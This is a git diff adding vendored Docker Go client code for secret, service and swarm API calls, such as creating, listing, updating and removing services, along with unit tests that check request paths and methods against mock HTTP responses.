diff --git a/vendor/github.com/docker/docker/client/secret_remove_test.go b/vendor/github.com/docker/docker/client/secret_remove_test.go
new file mode 100644
index 0000000000..f269f787d2
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/secret_remove_test.go
@@ -0,0 +1,47 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+)
+
+func TestSecretRemoveError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.SecretRemove(context.Background(), "secret_id")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestSecretRemove(t *testing.T) {
+	expectedURL := "/secrets/secret_id"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "DELETE" {
+				return nil, fmt.Errorf("expected DELETE method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte("body"))),
+			}, nil
+		}),
+	}
+
+	err := client.SecretRemove(context.Background(), "secret_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/secret_update.go b/vendor/github.com/docker/docker/client/secret_update.go
new file mode 100644
index 0000000000..b94e24aab0
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/secret_update.go
@@ -0,0 +1,19 @@
+package client
+
+import (
+	"net/url"
+	"strconv"
+
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// SecretUpdate updates a Secret. Currently, the only part of a secret spec
+// which can be updated is Labels.
+func (cli *Client) SecretUpdate(ctx context.Context, id string, version swarm.Version, secret swarm.SecretSpec) error {
+	query := url.Values{}
+	query.Set("version", strconv.FormatUint(version.Index, 10))
+	resp, err := cli.post(ctx, "/secrets/"+id+"/update", query, secret, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/secret_update_test.go b/vendor/github.com/docker/docker/client/secret_update_test.go
new file mode 100644
index 0000000000..c620985bd5
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/secret_update_test.go
@@ -0,0 +1,49 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types/swarm"
+)
+
+func TestSecretUpdateError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.SecretUpdate(context.Background(), "secret_id", swarm.Version{}, swarm.SecretSpec{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestSecretUpdate(t *testing.T) {
+	expectedURL := "/secrets/secret_id/update"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte("body"))),
+			}, nil
+		}),
+	}
+
+	err := client.SecretUpdate(context.Background(), "secret_id", swarm.Version{}, swarm.SecretSpec{})
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/service_create.go b/vendor/github.com/docker/docker/client/service_create.go
new file mode 100644
index 0000000000..3d1be225bd
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/service_create.go
@@ -0,0 +1,30 @@
+package client
+
+import (
+	"encoding/json"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// ServiceCreate creates a new Service.
+func (cli *Client) ServiceCreate(ctx context.Context, service swarm.ServiceSpec, options types.ServiceCreateOptions) (types.ServiceCreateResponse, error) {
+	var headers map[string][]string
+
+	if options.EncodedRegistryAuth != "" {
+		headers = map[string][]string{
+			"X-Registry-Auth": {options.EncodedRegistryAuth},
+		}
+	}
+
+	var response types.ServiceCreateResponse
+	resp, err := cli.post(ctx, "/services/create", nil, service, headers)
+	if err != nil {
+		return response, err
+	}
+
+	err = json.NewDecoder(resp.body).Decode(&response)
+	ensureReaderClosed(resp)
+	return response, err
+}
diff --git a/vendor/github.com/docker/docker/client/service_create_test.go b/vendor/github.com/docker/docker/client/service_create_test.go
new file mode 100644
index 0000000000..1e07382870
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/service_create_test.go
@@ -0,0 +1,57 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+func TestServiceCreateError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ServiceCreate(context.Background(), swarm.ServiceSpec{}, types.ServiceCreateOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestServiceCreate(t *testing.T) {
+	expectedURL := "/services/create"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+			b, err := json.Marshal(types.ServiceCreateResponse{
+				ID: "service_id",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(b)),
+			}, nil
+		}),
+	}
+
+	r, err := client.ServiceCreate(context.Background(), swarm.ServiceSpec{}, types.ServiceCreateOptions{})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if r.ID != "service_id" {
+		t.Fatalf("expected `service_id`, got %s", r.ID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/service_inspect.go b/vendor/github.com/docker/docker/client/service_inspect.go
new file mode 100644
index 0000000000..ca71cbde1a
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/service_inspect.go
@@ -0,0 +1,33 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"io/ioutil"
+	"net/http"
+
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// ServiceInspectWithRaw returns the service information and the raw data.
+func (cli *Client) ServiceInspectWithRaw(ctx context.Context, serviceID string) (swarm.Service, []byte, error) {
+	serverResp, err := cli.get(ctx, "/services/"+serviceID, nil, nil)
+	if err != nil {
+		if serverResp.statusCode == http.StatusNotFound {
+			return swarm.Service{}, nil, serviceNotFoundError{serviceID}
+		}
+		return swarm.Service{}, nil, err
+	}
+	defer ensureReaderClosed(serverResp)
+
+	body, err := ioutil.ReadAll(serverResp.body)
+	if err != nil {
+		return swarm.Service{}, nil, err
+	}
+
+	var response swarm.Service
+	rdr := bytes.NewReader(body)
+	err = json.NewDecoder(rdr).Decode(&response)
+	return response, body, err
+}
diff --git a/vendor/github.com/docker/docker/client/service_inspect_test.go b/vendor/github.com/docker/docker/client/service_inspect_test.go
new file mode 100644
index 0000000000..e235cf0fef
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/service_inspect_test.go
@@ -0,0 +1,65 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+func TestServiceInspectError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, _, err := client.ServiceInspectWithRaw(context.Background(), "nothing")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestServiceInspectServiceNotFound(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusNotFound, "Server error")),
+	}
+
+	_, _, err := client.ServiceInspectWithRaw(context.Background(), "unknown")
+	if err == nil || !IsErrServiceNotFound(err) {
+		t.Fatalf("expected an serviceNotFoundError error, got %v", err)
+	}
+}
+
+func TestServiceInspect(t *testing.T) {
+	expectedURL := "/services/service_id"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			content, err := json.Marshal(swarm.Service{
+				ID: "service_id",
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+
+	serviceInspect, _, err := client.ServiceInspectWithRaw(context.Background(), "service_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if serviceInspect.ID != "service_id" {
+		t.Fatalf("expected `service_id`, got %s", serviceInspect.ID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/service_list.go b/vendor/github.com/docker/docker/client/service_list.go
new file mode 100644
index 0000000000..c29e6d407d
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/service_list.go
@@ -0,0 +1,35 @@
+package client
+
+import (
+	"encoding/json"
+	"net/url"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// ServiceList returns the list of services.
+func (cli *Client) ServiceList(ctx context.Context, options types.ServiceListOptions) ([]swarm.Service, error) {
+	query := url.Values{}
+
+	if options.Filters.Len() > 0 {
+		filterJSON, err := filters.ToParam(options.Filters)
+		if err != nil {
+			return nil, err
+		}
+
+		query.Set("filters", filterJSON)
+	}
+
+	resp, err := cli.get(ctx, "/services", query, nil)
+	if err != nil {
+		return nil, err
+	}
+
+	var services []swarm.Service
+	err = json.NewDecoder(resp.body).Decode(&services)
+	ensureReaderClosed(resp)
+	return services, err
+}
diff --git a/vendor/github.com/docker/docker/client/service_list_test.go b/vendor/github.com/docker/docker/client/service_list_test.go
new file mode 100644
index 0000000000..213981ef70
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/service_list_test.go
@@ -0,0 +1,94 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+func TestServiceListError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.ServiceList(context.Background(), types.ServiceListOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestServiceList(t *testing.T) {
+	expectedURL := "/services"
+
+	filters := filters.NewArgs()
+	filters.Add("label", "label1")
+	filters.Add("label", "label2")
+
+	listCases := []struct {
+		options             types.ServiceListOptions
+		expectedQueryParams map[string]string
+	}{
+		{
+			options: types.ServiceListOptions{},
+			expectedQueryParams: map[string]string{
+				"filters": "",
+			},
+		},
+		{
+			options: types.ServiceListOptions{
+				Filters: filters,
+			},
+			expectedQueryParams: map[string]string{
+				"filters": `{"label":{"label1":true,"label2":true}}`,
+			},
+		},
+	}
+	for _, listCase := range listCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				query := req.URL.Query()
+				for key, expected := range listCase.expectedQueryParams {
+					actual := query.Get(key)
+					if actual != expected {
+						return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual)
+					}
+				}
+				content, err := json.Marshal([]swarm.Service{
+					{
+						ID: "service_id1",
+					},
+					{
+						ID: "service_id2",
+					},
+				})
+				if err != nil {
+					return nil, err
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader(content)),
+				}, nil
+			}),
+		}
+
+		services, err := client.ServiceList(context.Background(), listCase.options)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if len(services) != 2 {
+			t.Fatalf("expected 2 services, got %v", services)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/service_logs.go b/vendor/github.com/docker/docker/client/service_logs.go
new file mode 100644
index 0000000000..24384e3ec0
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/service_logs.go
@@ -0,0 +1,52 @@
+package client
+
+import (
+	"io"
+	"net/url"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	timetypes "github.com/docker/docker/api/types/time"
+)
+
+// ServiceLogs returns the logs generated by a service in an io.ReadCloser.
+// It's up to the caller to close the stream.
+func (cli *Client) ServiceLogs(ctx context.Context, serviceID string, options types.ContainerLogsOptions) (io.ReadCloser, error) {
+	query := url.Values{}
+	if options.ShowStdout {
+		query.Set("stdout", "1")
+	}
+
+	if options.ShowStderr {
+		query.Set("stderr", "1")
+	}
+
+	if options.Since != "" {
+		ts, err := timetypes.GetTimestamp(options.Since, time.Now())
+		if err != nil {
+			return nil, err
+		}
+		query.Set("since", ts)
+	}
+
+	if options.Timestamps {
+		query.Set("timestamps", "1")
+	}
+
+	if options.Details {
+		query.Set("details", "1")
+	}
+
+	if options.Follow {
+		query.Set("follow", "1")
+	}
+	query.Set("tail", options.Tail)
+
+	resp, err := cli.get(ctx, "/services/"+serviceID+"/logs", query, nil)
+	if err != nil {
+		return nil, err
+	}
+	return resp.body, nil
+}
diff --git a/vendor/github.com/docker/docker/client/service_logs_test.go b/vendor/github.com/docker/docker/client/service_logs_test.go
new file mode 100644
index 0000000000..a6d002ba75
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/service_logs_test.go
@@ -0,0 +1,133 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"log"
+	"net/http"
+	"os"
+	"strings"
+	"testing"
+	"time"
+
+	"github.com/docker/docker/api/types"
+
+	"golang.org/x/net/context"
+)
+
+func TestServiceLogsError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+	_, err := client.ServiceLogs(context.Background(), "service_id", types.ContainerLogsOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+	_, err = client.ServiceLogs(context.Background(), "service_id", types.ContainerLogsOptions{
+		Since: "2006-01-02TZ",
+	})
+	if err == nil || !strings.Contains(err.Error(), `parsing time "2006-01-02TZ"`) {
+		t.Fatalf("expected a 'parsing time' error, got %v", err)
+	}
+}
+
+func TestServiceLogs(t *testing.T) {
+	expectedURL := "/services/service_id/logs"
+	cases := []struct {
+		options             types.ContainerLogsOptions
+		expectedQueryParams map[string]string
+	}{
+		{
+			expectedQueryParams: map[string]string{
+				"tail": "",
+			},
+		},
+		{
+			options: types.ContainerLogsOptions{
+				Tail: "any",
+			},
+			expectedQueryParams: map[string]string{
+				"tail": "any",
+			},
+		},
+		{
+			options: types.ContainerLogsOptions{
+				ShowStdout: true,
+				ShowStderr: true,
+				Timestamps: true,
+				Details:    true,
+				Follow:     true,
+			},
+			expectedQueryParams: map[string]string{
+				"tail":       "",
+				"stdout":     "1",
+				"stderr":     "1",
+				"timestamps": "1",
+				"details":    "1",
+				"follow":     "1",
+			},
+		},
+		{
+			options: types.ContainerLogsOptions{
+				// An complete invalid date, timestamp or go duration will be
+				// passed as is
+				Since: "invalid but valid",
+			},
+			expectedQueryParams: map[string]string{
+				"tail":  "",
+				"since": "invalid but valid",
+			},
+		},
+	}
+	for _, logCase := range cases {
+		client := &Client{
+			client: newMockClient(func(r *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(r.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL)
+				}
+				// Check query parameters
+				query := r.URL.Query()
+				for key, expected := range logCase.expectedQueryParams {
+					actual := query.Get(key)
+					if actual != expected {
+						return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual)
+					}
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader([]byte("response"))),
+				}, nil
+			}),
+		}
+		body, err := client.ServiceLogs(context.Background(), "service_id", logCase.options)
+		if err != nil {
+			t.Fatal(err)
+		}
+		defer body.Close()
+		content, err := ioutil.ReadAll(body)
+		if err != nil {
+			t.Fatal(err)
+		}
+		if string(content) != "response" {
+			t.Fatalf("expected response to contain 'response', got %s", string(content))
+		}
+	}
+}
+
+func ExampleClient_ServiceLogs_withTimeout() {
+	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
+	defer cancel()
+
+	client, _ := NewEnvClient()
+	reader, err := client.ServiceLogs(ctx, "service_id", types.ContainerLogsOptions{})
+	if err != nil {
+		log.Fatal(err)
+	}
+
+	_, err = io.Copy(os.Stdout, reader)
+	if err != nil && err != io.EOF {
+		log.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/service_remove.go b/vendor/github.com/docker/docker/client/service_remove.go
new file mode 100644
index 0000000000..a9331f92c2
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/service_remove.go
@@ -0,0 +1,10 @@
+package client
+
+import "golang.org/x/net/context"
+
+// ServiceRemove kills and removes a service.
+func (cli *Client) ServiceRemove(ctx context.Context, serviceID string) error {
+	resp, err := cli.delete(ctx, "/services/"+serviceID, nil, nil)
+	ensureReaderClosed(resp)
+	return err
+}
diff --git a/vendor/github.com/docker/docker/client/service_remove_test.go b/vendor/github.com/docker/docker/client/service_remove_test.go
new file mode 100644
index 0000000000..8e2ac259c1
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/service_remove_test.go
@@ -0,0 +1,47 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+)
+
+func TestServiceRemoveError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	err := client.ServiceRemove(context.Background(), "service_id")
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestServiceRemove(t *testing.T) {
+	expectedURL := "/services/service_id"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "DELETE" {
+				return nil, fmt.Errorf("expected DELETE method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte("body"))),
+			}, nil
+		}),
+	}
+
+	err := client.ServiceRemove(context.Background(), "service_id")
+	if err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/service_update.go b/vendor/github.com/docker/docker/client/service_update.go
new file mode 100644
index 0000000000..afa94d47e2
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/service_update.go
@@ -0,0 +1,41 @@
+package client
+
+import (
+	"encoding/json"
+	"net/url"
+	"strconv"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// ServiceUpdate updates a Service.
+func (cli *Client) ServiceUpdate(ctx context.Context, serviceID string, version swarm.Version, service swarm.ServiceSpec, options types.ServiceUpdateOptions) (types.ServiceUpdateResponse, error) {
+	var (
+		headers map[string][]string
+		query   = url.Values{}
+	)
+
+	if options.EncodedRegistryAuth != "" {
+		headers = map[string][]string{
+			"X-Registry-Auth": {options.EncodedRegistryAuth},
+		}
+	}
+
+	if options.RegistryAuthFrom != "" {
+		query.Set("registryAuthFrom", options.RegistryAuthFrom)
+	}
+
+	query.Set("version", strconv.FormatUint(version.Index, 10))
+
+	var response types.ServiceUpdateResponse
+	resp, err := cli.post(ctx, "/services/"+serviceID+"/update", query, service, headers)
+	if err != nil {
+		return response, err
+	}
+
+	err = json.NewDecoder(resp.body).Decode(&response)
+	ensureReaderClosed(resp)
+	return response, err
+}
diff --git a/vendor/github.com/docker/docker/client/service_update_test.go b/vendor/github.com/docker/docker/client/service_update_test.go
new file mode 100644
index 0000000000..76bea176bf
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/service_update_test.go
@@ -0,0 +1,77 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/swarm"
+)
+
+func TestServiceUpdateError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.ServiceUpdate(context.Background(), "service_id", swarm.Version{}, swarm.ServiceSpec{}, types.ServiceUpdateOptions{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestServiceUpdate(t *testing.T) {
+	expectedURL := "/services/service_id/update"
+
+	updateCases := []struct {
+		swarmVersion    swarm.Version
+		expectedVersion string
+	}{
+		{
+			expectedVersion: "0",
+		},
+		{
+			swarmVersion: swarm.Version{
+				Index: 0,
+			},
+			expectedVersion: "0",
+		},
+		{
+			swarmVersion: swarm.Version{
+				Index: 10,
+			},
+			expectedVersion: "10",
+		},
+	}
+
+	for _, updateCase := range updateCases {
+		client := &Client{
+			client: newMockClient(func(req *http.Request) (*http.Response, error) {
+				if !strings.HasPrefix(req.URL.Path, expectedURL) {
+					return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+				}
+				if req.Method != "POST" {
+					return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+				}
+				version := req.URL.Query().Get("version")
+				if version != updateCase.expectedVersion {
+					return nil, fmt.Errorf("version not set in URL query properly, expected '%s', got %s", updateCase.expectedVersion, version)
+				}
+				return &http.Response{
+					StatusCode: http.StatusOK,
+					Body:       ioutil.NopCloser(bytes.NewReader([]byte("{}"))),
+				}, nil
+			}),
+		}
+
+		_, err := client.ServiceUpdate(context.Background(), "service_id", updateCase.swarmVersion, swarm.ServiceSpec{}, types.ServiceUpdateOptions{})
+		if err != nil {
+			t.Fatal(err)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go b/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go
new file mode 100644
index 0000000000..be28d32628
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/swarm_get_unlock_key.go
@@ -0,0 +1,21 @@
+package client
+
+import (
+	"encoding/json"
+
+	"github.com/docker/docker/api/types"
+	"golang.org/x/net/context"
+)
+
+// SwarmGetUnlockKey retrieves the swarm's unlock key.
+func (cli *Client) SwarmGetUnlockKey(ctx context.Context) (types.SwarmUnlockKeyResponse, error) {
+	serverResp, err := cli.get(ctx, "/swarm/unlockkey", nil, nil)
+	if err != nil {
+		return types.SwarmUnlockKeyResponse{}, err
+	}
+
+	var response types.SwarmUnlockKeyResponse
+	err = json.NewDecoder(serverResp.body).Decode(&response)
+	ensureReaderClosed(serverResp)
+	return response, err
+}
diff --git a/vendor/github.com/docker/docker/client/swarm_init.go b/vendor/github.com/docker/docker/client/swarm_init.go
new file mode 100644
index 0000000000..fd45d066e3
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/swarm_init.go
@@ -0,0 +1,21 @@
+package client
+
+import (
+	"encoding/json"
+
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// SwarmInit initializes the Swarm.
+func (cli *Client) SwarmInit(ctx context.Context, req swarm.InitRequest) (string, error) {
+	serverResp, err := cli.post(ctx, "/swarm/init", nil, req, nil)
+	if err != nil {
+		return "", err
+	}
+
+	var response string
+	err = json.NewDecoder(serverResp.body).Decode(&response)
+	ensureReaderClosed(serverResp)
+	return response, err
+}
diff --git a/vendor/github.com/docker/docker/client/swarm_init_test.go b/vendor/github.com/docker/docker/client/swarm_init_test.go
new file mode 100644
index 0000000000..811155aff4
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/swarm_init_test.go
@@ -0,0 +1,54 @@
+package client
+
+import (
+	"bytes"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types/swarm"
+)
+
+func TestSwarmInitError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.SwarmInit(context.Background(), swarm.InitRequest{})
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestSwarmInit(t *testing.T) {
+	expectedURL := "/swarm/init"
+
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			if req.Method != "POST" {
+				return nil, fmt.Errorf("expected POST method, got %s", req.Method)
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader([]byte(`"body"`))),
+			}, nil
+		}),
+	}
+
+	resp, err := client.SwarmInit(context.Background(), swarm.InitRequest{
+		ListenAddr: "0.0.0.0:2377",
+	})
+	if err != nil {
+		t.Fatal(err)
+	}
+	if resp != "body" {
+		t.Fatalf("Expected 'body', got %s", resp)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/swarm_inspect.go b/vendor/github.com/docker/docker/client/swarm_inspect.go
new file mode 100644
index 0000000000..6d95cfc05e
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/swarm_inspect.go
@@ -0,0 +1,21 @@
+package client
+
+import (
+	"encoding/json"
+
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// SwarmInspect inspects the Swarm.
+func (cli *Client) SwarmInspect(ctx context.Context) (swarm.Swarm, error) {
+	serverResp, err := cli.get(ctx, "/swarm", nil, nil)
+	if err != nil {
+		return swarm.Swarm{}, err
+	}
+
+	var response swarm.Swarm
+	err = json.NewDecoder(serverResp.body).Decode(&response)
+	ensureReaderClosed(serverResp)
+	return response, err
+}
diff --git a/vendor/github.com/docker/docker/client/swarm_inspect_test.go b/vendor/github.com/docker/docker/client/swarm_inspect_test.go
new file mode 100644
index 0000000000..6432d172b4
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/swarm_inspect_test.go
@@ -0,0 +1,56 @@
+package client
+
+import (
+	"bytes"
+	"encoding/json"
+	"fmt"
+	"io/ioutil"
+	"net/http"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+func TestSwarmInspectError(t *testing.T) {
+	client := &Client{
+		client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")),
+	}
+
+	_, err := client.SwarmInspect(context.Background())
+	if err == nil || err.Error() != "Error response from daemon: Server error" {
+		t.Fatalf("expected a Server Error, got %v", err)
+	}
+}
+
+func TestSwarmInspect(t *testing.T) {
+	expectedURL := "/swarm"
+	client := &Client{
+		client: newMockClient(func(req *http.Request) (*http.Response, error) {
+			if !strings.HasPrefix(req.URL.Path, expectedURL) {
+				return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL)
+			}
+			content, err := json.Marshal(swarm.Swarm{
+				ClusterInfo: swarm.ClusterInfo{
+					ID: "swarm_id",
+				},
+			})
+			if err != nil {
+				return nil, err
+			}
+			return &http.Response{
+				StatusCode: http.StatusOK,
+				Body:       ioutil.NopCloser(bytes.NewReader(content)),
+			}, nil
+		}),
+	}
+
+	swarmInspect, err := client.SwarmInspect(context.Background())
+	if err != nil {
+		t.Fatal(err)
+	}
+	if swarmInspect.ID != "swarm_id" {
+		t.Fatalf("expected `swarm_id`, got %s", swarmInspect.ID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/client/swarm_join.go b/vendor/github.com/docker/docker/client/swarm_join.go
new file mode 100644
index 0000000000..cda99930eb
--- /dev/null
+++ b/vendor/github.com/docker/docker/client/swarm_join.go
@@ -0,0 +1,13 @@
+package client
+
+import (
+	"github.com/docker/docker/api/types/swarm"
+	"golang.org/x/net/context"
+)
+
+// SwarmJoin joins the Swarm.
+func (cli *Client) SwarmJoin(ctx context.Context, req swarm.JoinRequest) error {
+	resp, err := cli.post(ctx, "/swarm/join", nil, req, nil)
+	ensureReaderClosed(resp)
+	return err
+}
